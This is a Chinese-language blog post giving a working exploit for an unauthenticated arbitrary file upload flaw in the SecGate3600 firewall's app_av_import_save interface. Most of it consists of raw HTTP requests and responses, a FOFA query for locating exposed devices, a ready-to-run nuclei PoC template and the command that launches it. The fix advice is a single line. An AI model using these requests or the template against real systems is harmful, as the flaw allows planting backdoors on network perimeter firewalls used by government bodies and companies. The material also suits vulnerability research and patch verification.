奇安信网神SecGate3600防火墙app_av_import_save任意文件上传漏洞
免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!
漏洞名称
奇安信网神SecGate3600防火墙app_av_import_save任意文件上传漏洞
漏洞影响
网神SecGate3600防火墙
漏洞描述
网神SecGate3600防火墙是一款能够全面应对传统网络攻击和高级威胁的创新型防火墙产品,基于麒麟操作系统与飞腾硬件平台打造,可广泛运用于政府机构、各类企业和组织的业务网络边界,实现网络安全域隔离、精细化访问控制、高效的威胁防护和高级威胁检测等功能。该软件app_av_import_save接口存在文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
FOFA搜索语句
fid="1Lh1LHi6yfkhiO83I59AYg=="
漏洞复现
第一步,向靶场发送如下数据包上传文件
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain
wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--
响应内容如下
HTTP/1.1 302 Found
Set-Cookie: __s_sessionid__=0s0uco29hd2esn4sqqm732i1h6; path=/
Pragma: no-cache
Location: /?permission_error=1
Date: Tue, 26 Dec 2023 10:05:42 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
File is valid, and was successfully uploaded.
Array
(
[upfile] => Array
(
[name] => hulnknxa.txt
[type] => text/plain
[tmp_name] => /tmp/phpH9QluX
[error] => 0
[size] => 32
)
)
第二步,访问回显文件
GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
响应数据包如下
HTTP/1.1 200 OK
Date: Tue, 26 Dec 2023 10:05:42 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Etag: "3338122476"
Last-Modified: Tue, 26 Dec 2023 10:05:42 GMT
Content-Length: 32
wagletqrkwrddkthtulxsqrphulnknxa
漏洞复现成功
nuclei poc
poc文件内容如下
id: qianxin-secworld-secgate3600-app_av_import_save-fileupload
info:
name: 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传漏洞
author: fgz
severity: critical
description: 网神SecGate3600防火墙是一款能够全面应对传统网络攻击和高级威胁的创新型防火墙产品,基于麒麟操作系统与飞腾硬件平台打造,可广泛运用于政府机构、各类企业和组织的业务网络边界,实现网络安全域隔离、精细化访问控制、高效的威胁防护和高级威胁检测等功能。该软件app_av_import_save接口存在文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
metadata:
max-request: 1
fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg=="
verified: true
variables:
file_name: "{{to_lower(rand_text_alpha(8))}}"
file_content: "{{to_lower(rand_text_alpha(20))}}"
rboundary: "{{to_lower(rand_text_alpha(26))}}"
requests:
- raw:
- |+
POST /?g=app_av_import_save HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----{{rboundary}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
------{{rboundary}}
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------{{rboundary}}
Content-Disposition: form-data; name="upfile"; filename="{{file_name}}.txt"
Content-Type: text/plain
{{file_content}}
------{{rboundary}}
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------{{rboundary}}
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------{{rboundary}}--
- |
GET /attachements/{{file_name}}.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
matchers:
- type: dsl
dsl:
- "status_code_1 == 302 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"
运行POC
nuclei.exe -t mypoc/奇安信/qianxin-secworld-secgate3600-app_av_import_save-fileupload.yaml -u http://x.x.x.x
修复建议
升级到最新版本。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果